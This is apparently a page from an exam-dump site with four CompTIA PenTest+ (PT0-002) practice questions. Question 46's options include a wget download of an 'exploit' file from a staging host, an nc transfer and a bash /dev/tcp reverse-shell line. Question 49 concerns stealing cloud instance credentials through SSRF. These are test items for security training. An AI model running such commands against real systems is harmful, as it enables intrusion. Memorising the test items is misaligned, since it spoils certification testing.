Free Access CompTIA.PT0-002.v2022-04-29.q49 Practice Test (Page 11)

Question 46

A penetration tester ran the following command on a staging server:
python -m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?

A.nc 10.10.51.50 9891 < exploit

B.wget 10.10.51.50:9891/exploit

C.powershell -exec bypass -f \\10.10.51.50\9891

D.bash -i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit

Question 47

A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position.
Which of the following actions, if performed, would be ethical within the scope of the assessment?

A.Gaining access to hosts by injecting malware into the enterprise-wide update server

B.Leveraging a vulnerability on the internal CA to issue fraudulent client certificates

C.Intercepting outbound TLS traffic

D.Exploiting a configuration weakness in the SQL database

E.Establishing and maintaining persistence on the domain controller

Question 48

A penetration tester has been hired to configure and conduct authenticated scans of all the servers on a software company's network. Which of the following accounts should the tester use to return the MOST results?

A.Network administrator

B.Root user

C.Service

D.Local administrator

Question 49

A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider's metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited?

A.Cross-site request forgery

B.Server-side request forgery

C.Remote file inclusion

D.Local file inclusion

Other Version: 714CompTIA.PT0-002.v2025-07-15.q245; 1398CompTIA.PT0-002.v2024-06-12.q330; 1159CompTIA.PT0-002.v2023-02-20.q55; 1745CompTIA.PT0-002.v2022-07-29.q85; 1522CompTIA.PT0-002.v2022-04-23.q65; 95CompTIA.Trainingdump.PT0-002.v2021-12-19.by.barlow.38q.pdf

Latest Upload: 101OCEG.GRCP.v2025-09-11.q211; 101HP.HPE0-V27.v2025-09-11.q78; 117Oracle.1Z0-1057-23.v2025-09-10.q47; 150Google.Professional-Cloud-Network-Engineer.v2025-09-09.q179; 131SAP.C-S4EWM-2023.v2025-09-08.q83; 164TheSecOpsGroup.CNSP.v2025-09-08.q20; 222CFAInstitute.ESG-Investing.v2025-09-08.q173; 157PECB.ISO-IEC-27001-Lead-Implementer.v2025-09-06.q132; 146Salesforce.Data-Architect.v2025-09-05.q216; 141Adobe.AD0-E605.v2025-09-05.q50

Question 46

Question 47

Question 48

Question 49

Download PDF File